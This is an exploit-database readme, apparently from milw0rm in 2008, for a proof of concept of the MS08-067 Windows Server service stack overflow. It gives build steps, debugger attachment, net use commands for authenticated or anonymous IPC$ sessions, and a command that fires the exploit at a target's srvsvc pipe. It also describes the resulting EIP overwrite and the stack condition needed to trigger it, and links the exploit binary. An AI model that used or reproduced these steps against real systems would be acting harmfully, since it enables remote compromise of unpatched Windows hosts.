26 lines
No EOL
794 B
Text
26 lines
No EOL
794 B
Text
In vstudio command prompt:
|
|
|
|
mk.bat
|
|
|
|
next:
|
|
|
|
attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/...)
|
|
|
|
net use \\IPADDRESS\IPC$ /user:user creds
|
|
die \\IPADDRESS \pipe\srvsvc
|
|
|
|
In some cases, /user:"" "", will suffice (i.e., anonymous connection)
|
|
|
|
You should get EIP -> 00 78 00 78, a stack overflow (like a guard page
|
|
violation), access violation, etc. However, in some cases, you will get
|
|
nothing.
|
|
|
|
This is because it depends on the state of the stack prior to the "overflow".
|
|
You need a slash on the stack prior to the input buffer.
|
|
|
|
So play around a bit, you'll get it working reliably...
|
|
|
|
poc:
|
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/6824.zip (2008-ms08-067.zip)
|
|
|
|
# milw0rm.com [2008-10-23] |